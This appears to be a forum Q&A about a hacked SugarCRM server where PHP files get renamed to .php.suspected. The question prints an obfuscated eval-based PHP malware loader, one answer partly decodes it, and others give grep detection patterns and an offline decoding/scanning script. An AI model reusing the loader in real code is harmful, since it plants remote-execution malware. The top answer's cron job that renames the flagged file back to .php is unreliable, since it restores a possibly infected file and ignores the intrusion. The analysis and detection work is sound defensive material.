Php file is automatically renamed to php.suspected

Over the past 4 days, we have encountered a problem on our production server (an instance of AWS EC2) related to only one site, which is SugarCRM.

The problem: /home/site_folder/public_html/include/MassUpdate.php is automatically renamed to /home/site_folder/public_html/include/MassUpdate.php.suspected

This happens 2-3 times a day, 3-4 hours apart. It occurs only on this particular site; it does not occur on a replica of the same site that we set up. I even compared the code of this file on both sites, and it is identical.

We have Googled and found that this problem occurs mainly on WordPress sites and may be due to an attack. But we checked our server for an attack and found nothing. Also, the server does not scan for viruses and malware.

What should we do?

Update: We found a few things after going through this link. We ran egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ and found several files containing code like the following example.

  <?php
  // Loader: per-character substitution of $s via the $koicev table, then base64_decode, then eval
  function flnftovr($hkbfqecms, $bezzmczom) {
      $ggy = '';
      for ($i = 0; $i < strlen($hkbfqecms); $i++) {
          $ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];
      }
      $ixo = "base64_decode";
      return $ixo($ggy);
  }
  $s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
       '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.
       'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
  $koicev = Array(
      '1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J',
      'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v',
      'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r',
      'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o',
      'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S',
      'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T',
      'x'=>'Z', 'z'=>'f'
  );
  // The decoded payload is executed directly
  eval(flnftovr($s, $koicev));
  ?>

This seems to be malware. How do we remove it permanently?

Thanks.

+13
linux php apache amazon-ec2 sugarcrm
4 answers

I am posting this answer because it may help others.

  1. Create a file with the extension .sh in a place convenient for you.
  2. Add the following code to it.

#!/bin/sh
# Rename your_file_name.php.suspected back to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

  3. Save this file.
  4. Install a cron job for every 10 minutes (or any other interval you need) using the following line in crontab:

*/10 * * * * path_to_cron_file.sh

  5. Restart the cron service.

You will get a lot of documentation on creating cron on Google.

0

This is somewhat confusing, but I decoded it. The flnftovr function takes a string and an array as arguments. It builds a new string $ggy using the formula

 isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];} 

Then it applies base64_decode to the resulting string.

The string is $s, the array is $koicev. Then it computes the result of this manipulation. So, in the end, this string is produced:

 base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=) 

So, what actually runs on your server:

 @ini_set('error_log', NULL);
 @ini_set('log_errors', 0);
 @ini_set('max_execution_time', 0);
 @set_time_limit(0);
 if(isset($_SERVER) encode(serialize($res)); }

If you did not create this, and you suspect that your site has been hacked, I suggest that you erase the server and create a new installation of any applications running on your server.

+2

Renaming .php files to .php.suspected is still happening today. The following commands should not find anything:

 find <web site root> -name '*.suspected' -print
 find <web site root> -name '.*.ico' -print

In my case, infected files can be detected using the following commands:

 cd <web site root>
 egrep -Rl '\$GLOBALS.*\\x'
 egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
 egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'

I prepared a more detailed description of the problem and how to deal with it on GitHub.

+1
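As an added example (not code from the question or from any of the answers), the Python below replays the substitution-then-base64 step of the flnftovr() loader offline, using the $koicev table and the $s payload transcribed from the question, so the payload can be read without ever reaching eval(); it also turns the find/egrep checks from the answer above into a directory scan. The names KOICEV, S_PAYLOAD, decode_loader, looks_like_loader and scan_tree are chosen here, and the regex is an assumption about this loader family's structure, not a published signature.

```python
import base64
import pathlib
import re

# Substitution table transcribed from the $koicev array in the question,
# as a key string and a value string in the page's order.
KOICEV = dict(zip(
    "1032547698ACBEDGFIHKJMLONQPSRUTWVYXZacbedgfihkjmlonqpsrutwvyxz",
    "n4y8EHjwgJYV3xQMiPUvWGLXbB9dIrOzFq0CDaKo5mh6cpsARSuNk7t2le1TZf",
))
# The $s payload as shown in the question; the forum display truncated its
# middle, so only the opening of the decoded script is fully recoverable.
S_PAYLOAD = (
    "DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV"
    "0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob"
    "zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X="
)

def decode_loader(payload: str, table: dict) -> str:
    """Replay flnftovr() offline: per-character substitution, then base64,
    without handing the result to eval()."""
    mapped = "".join(table.get(c, c) for c in payload)
    data = mapped.rstrip("=")
    if len(data) % 4 == 1:          # a truncated sample may leave a dangling char
        data = data[:-1]
    data += "=" * (-len(data) % 4)  # restore base64 padding before decoding
    return base64.b64decode(data).decode("utf-8", "replace")

# Structural signature of this loader family (assumed here): a function whose
# for-loop walks strlen() with an isset() lookup, later fed to eval(). Same idea
# as the question's egrep 'function.*for.*strlen.*isset', with the eval() sink added.
LOADER_RE = re.compile(
    r"function\s+\w+\s*\([^)]*\)\s*\{.*?for\s*\(.*?strlen\s*\(.*?isset\s*\(.*?\}"
    r".*?eval\s*\(",
    re.DOTALL,
)

def looks_like_loader(php_source: str) -> bool:
    return LOADER_RE.search(php_source) is not None

def scan_tree(root) -> dict:
    """Walk a web root like the find/egrep commands above: collect renamed
    *.suspected files and .php files matching the loader signature."""
    found = {"suspected": [], "loaders": []}
    for path in (p for p in pathlib.Path(root).rglob("*") if p.is_file()):
        if path.name.endswith(".suspected"):
            found["suspected"].append(str(path))
        elif path.suffix == ".php" and looks_like_loader(path.read_text(errors="replace")):
            found["loaders"].append(str(path))
    return found
```

Running decode_loader(S_PAYLOAD, KOICEV) yields the @ini_set('error_log', NULL); opening that the answer above recovered, with the rest of the decoded text unreliable because of the truncated sample.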

Renaming php files to php.suspected is usually intended and executed by a hacker script. They modify the file extension to give the impression that the file has been checked by some malware protection software, is safe and cannot be executed. But actually it is not. They change the extension back to "php" anytime they want to call the script, and after that they change the extension back to "suspected". You can read about it at Sucuri Research Labs.

Maybe this post is old, but the topic is still alive, especially in light of the June 2019 malware campaign targeting WordPress plugins. I found several "suspected" files in my WordPress clients' subdirectories (like wp-content).

0
